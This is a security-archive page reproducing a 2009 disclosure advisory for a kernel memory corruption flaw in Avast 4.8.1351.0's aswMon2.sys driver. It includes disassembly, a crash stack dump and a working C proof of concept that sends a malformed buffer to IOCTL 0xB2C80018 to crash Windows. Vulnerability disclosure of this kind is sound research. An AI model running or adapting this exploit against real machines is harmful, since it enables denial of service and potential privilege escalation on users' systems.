Avast 4.8.1351.0 Privilege Escalation

Avast 4.8.1351.0 Privilege Escalation: Posted Sep 24, 2009; Authored by Evilcry | Site evilcry.altervista.org; Avast Antivirus version 4.8.1351.0 suffers from local denial of service and privilege escalation vulnerabilities.; tags | exploit, denial of service, local, vulnerability; SHA-256 | d6451933802d3df89f2a5ce8ca47d3117537e0d2be76920dab7aa891534c3619; Download | Favorite | View

Avast 4.8.1351.0 Privilege Escalation

Source: https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php


-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM<br>
Website: http://evilcry.netsons.org<br>
http://evilcodecave.blogspot.com<br>
http://evilcodecave.wordpress.com<br>
http://evilfingers.com<br>

***Disclosure Timeline***
Discover Date: Sep 13, 2009  PoC Code: Sep 13, 2009<br>
Vendor Notify: Sep 15,2009   Vendor Reply: Sep 15, 2009<br><br>

After various mails about publishing date
ignored, here the Public Disclosure.

+--------------------------------------------------------------------------+
Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
   (untested) Local Privilege Escalation

+---------------------------------------------------------------------------+

--------------------------[Details]--------------->

Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that propagates 
on the system with a BSOD and potential risk of Privilege Escalation.<br><br>

00010F70    cmp     [ebp+arg_C], 288h   ;InBuff Len no other checks performed<br>
00010F77    jnz     loc_111AC<br>
00010F7D    mov     esi, [ebp+SourceString]<br>
00010F80    cmp     [esi], ebx<br>
00010F82    mov     [ebp+arg_C], ebx<br><br>


Affected IOCTL is B2C80018<br><br>

UNEXPECTED_KERNEL_MODE_TRAP_M (1000007f)<br><br>

Transfer Type: METHOD_BUFFERED<br><br>

STACK_TEXT:<br><br>

WARNING: Stack unwind information not available. Following frames may be wrong.<br>
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa<br>
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251<br>
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712<br>
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793<br><br>
.
f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251<br>
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04<br>
f76f5770 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5774 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5778 41414141 41414141 41414141 41414141 0x41414141<br>
f76f577c 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5780 41414141 41414141 41414141 41414141 0x41414141<br>
.<br><br>


+---------------------------------------------------------------------------+

/ * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption<br>
 *<br>
 * Author: Giuseppe 'Evilcry' Bonfa'<br>
 * E-Mail: evilcry _AT_ gmail _DOT_ com<br>
 * Website: http://evilcry.netsons.org<br>
 *          http://evilcodecave.blogspot.com <br>
 *      http://evilfingers.com<br>
 *<br>
 * Vendor: Notified<br>
 *<br>
 * No L.P.E. for kiddies<br>
 * /<br><br>

#define WIN32_LEAN_AND_MEAN<br>
#include < windows.h><br>
#include < stdio.h><br><br>


BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab<br>
{<br>
  WCHAR DeviceName[MAX_PATH];<br>
  HANDLE hDevice;<br>

  if ((GetVersion() & 0xFF) >= 5) <br>
  {<br>
    wcscpy(DeviceName, L"\\\\.\\Global\\");<br>
  } <br>
  else <br>
  {<br>
    wcscpy(DeviceName, L"\\\\.\\");<br>
  }<br><br>

  wcscat(DeviceName, DriverName);<br>

  printf("Opening.. %S\n", DeviceName);<br>

  hDevice = CreateFileW(DeviceName, GENERIC_READ | <br>
  GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 
    FILE_ATTRIBUTE_NORMAL, NULL);<br><br>

  if (hDevice == INVALID_HANDLE_VALUE)<br>
  {<br>
    printf("CreateFile() ERROR %d\n", GetLastError());<br>
    return FALSE;<br>
  }<br><br>

  *lphDevice = hDevice;<br>

  return TRUE;<br>
}<br><br>

int main()<br>
{<br>
  HANDLE hDev = NULL;<br>
  DWORD Junk;<br>

  if(!OpenDevice(L"aswMon",&hDev))<br>
  {<br>
    printf("Unable to access aswMon");<br>
    return(0);<br>
  }<br><br>

  char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | <br>
  MEM_COMMIT, PAGE_EXECUTE_READWRITE);<br><br>

  if (Buff)<br>
  {<br>
    memset(Buff, 'A', 0x288);<br>
    DeviceIoControl(hDev,0xB2C80018,Buff,
    0x288,Buff,0x288,&Junk,(LPOVERLAPPED)NULL);<br>
    printf("DeviceIoControl Executed..\n");  <br>  
  }    <br>
  else<br>
  {<br>
    printf("VirtualAlloc() ERROR %d\n", GetLastError());<br>
  }<br>


  return(0);<br>
}<br><br>



+---------------------------------------------------------------------------+


Regards,
Giuseppe 'Evilcry' Bonfa'

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Avast 4.8.1351.0 Privilege Escalation

Avast 4.8.1351.0 Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Avast 4.8.1351.0 Privilege Escalation

Share This

Avast 4.8.1351.0 Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems